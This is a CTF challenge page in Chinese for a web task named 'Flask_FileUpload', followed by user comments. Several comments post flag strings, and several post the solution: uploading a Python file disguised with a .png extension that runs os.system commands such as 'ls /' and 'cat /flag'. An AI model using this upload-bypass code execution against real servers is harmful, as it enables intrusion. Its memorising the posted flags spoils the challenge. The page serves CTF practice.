Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 11819
提  示:
描  述:
Flask_FileUpload
评论
Wang_Micro 15天前

flag{bf686c3799aa1aa32c4c8b025bba84a7}

回复 0

tkStar 3月前

先看源码,只检查了后缀是png,上传包含系统命令的python文件,后缀改成png就行

回复 0

2808476708 3月前

flag{abe11096bb1215a2a5f8696f4ab98f1f}

回复 0

yvonne 3月前

import os 换行 os.system()

回复 0

1uxu4y 3月前

flag{a04e45c0960f5413e9847ea5d666d5d5}

回复 0

18835508637 3月前

flag{8b6840315d0d9b357abeb8cfe1dbeb5a}

回复 0

tot1987 4月前

新建txt,输入: import os os.system('ls /') 保存为a.png,然后上传,发现根目录下有个flag, 然后在修改txt内容为: import os os.system('cat /flag') 保存后,再上传,在新页面中查看源码,得到flag

回复 6

Chibits 4月前

import os os.chdir('..') print(os.listdir('.')) os.system('cat flag')

回复 0

不会写代码的菜鸟 4月前

作为一个没学过python的小菜鸡,能告诉我为啥要import os吗?我还以为直接 LS cat /flag就可以

回复 0
Life000 4月前

因为python执行系统命令需要os这个库

回复 0

q1152874733 4月前

这个代码只检查文件后缀对不对,需要将python代码文件后缀改为php上传 并查看返回页面源代码 代码如下: import os os.system('cat /flag')

回复 0

WriteUp

image
国家级划水运动员

3 金币

评分(19)

解题动态

zxqtd1 攻破了该题 21小时前
19966599351 攻破了该题 1天前
3121985758 攻破了该题 2天前
abandon006 攻破了该题 2天前
naomi99 攻破了该题 3天前
cy1393842050 攻破了该题 3天前
Fahai 攻破了该题 3天前
zttyzz 攻破了该题 3天前
16671766779 攻破了该题 4天前
zxingxing121 攻破了该题 5天前
GTfree 攻破了该题 5天前
byx341 攻破了该题 5天前
hzx20060101 攻破了该题 6天前
123456789000000 攻破了该题 6天前
17280870197 攻破了该题 8天前
tushen 攻破了该题 9天前
Tsukisec 攻破了该题 9天前
不知道 攻破了该题 9天前
bcywlj 攻破了该题 9天前
胡萝卜 攻破了该题 11天前
问题反馈